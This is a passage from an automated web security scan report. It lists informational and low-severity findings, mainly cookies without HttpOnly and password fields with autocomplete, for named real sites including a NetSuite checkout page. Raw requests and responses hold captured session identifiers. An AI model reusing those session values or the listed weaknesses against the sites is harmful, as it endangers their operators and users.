Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.5.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733882

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733884; expires=Mon, 25-Apr-2011 12:28:04 GMT; path=/
Content-Type: text/html
Content-Length: 12851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Digital Forensics</title>
<meta http-equiv="
...[SNIP]...
17.244. http://www.smpone.com/Sections-read-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-3.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.11.10.1303732845; PHPSESSID=b07217b91d15829f50a400a4c700d48f; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733904

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733931; expires=Mon, 25-Apr-2011 12:28:51 GMT; path=/
Content-Type: text/html
Content-Length: 13520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Directions</title>
<meta http-equiv="Content
...[SNIP]...
17.245. http://www.smpone.com/Sections-read-30.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-30.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-30.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.14.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733938

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733947; expires=Mon, 25-Apr-2011 12:29:07 GMT; path=/
Content-Type: text/html
Content-Length: 12409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Industries</title>
<meta http-equiv="Content
...[SNIP]...
17.246. http://www.smpone.com/Sections-read-7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-7.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-7.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.6.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733885

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733887; expires=Mon, 25-Apr-2011 12:28:07 GMT; path=/
Content-Type: text/html
Content-Length: 13924

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Risk Assess
...[SNIP]...
17.247. http://www.smpone.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-126.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733897

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 14568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Contact Inf
...[SNIP]...
17.248. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tns-counter.ru
Path:   /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 HTTP/1.1
Host: www.tns-counter.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: tns-counter.0.5.3
Date: Mon, 25 Apr 2011 14:20:23 GMT
Content-Type: image/gif
Content-Length: 43
Location: http://www.tns-counter.ru/V13b***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Set-Cookie: guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

GIF89a.............!.......,...........L..;
17.249. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=b8637d1e5bc7394c963fe8caf8da98b0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 15860

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Website Development | Web Content Management | CMS | Web Design | New Jers
...[SNIP]...
17.250. http://www.tresware.com/CustomPHPProgrammingNJ.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /CustomPHPProgrammingNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CustomPHPProgrammingNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900; igyi[s]=885141303733914696

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733986; expires=Mon, 25-Apr-2011 12:29:46 GMT; path=/
Content-Type: text/html
Content-Length: 14485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Custom PHP Programming | Website PHP Development | Custom PHP Development
...[SNIP]...
17.251. http://www.tresware.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/webcontentmanagementNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733993

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/
Content-Type: text/html
Content-Length: 23772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tresware Contact Us | Web Development | Web Design, Managed Web Hosting |
...[SNIP]...
17.252. http://www.tresware.com/webcontentmanagementNJ.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /webcontentmanagementNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webcontentmanagementNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/CustomPHPProgrammingNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733986

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733993; expires=Mon, 25-Apr-2011 12:29:53 GMT; path=/
Content-Type: text/html
Content-Length: 14368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Web Content Management | Webpage Editing | Content Management | CMS | Real
...[SNIP]...
18. Password field with autocomplete enabled  previous  next
There are 307 instances of this issue:

18.1. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
<td width=0 height=0 align='left' valign='top' style='display:none'>
<form method='post' name='login' id='login' action='/app/site/backend/customerlogin.nl' onkeypress='if (getEventKeypress(event) == 13) {if (getEventTargetType(event) == "textarea") return true;document.forms.login.submit(); event.cancelBubble=true; return false;}'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="retpwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="retpwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}return this.isvalid;" name="retpwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...
18.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
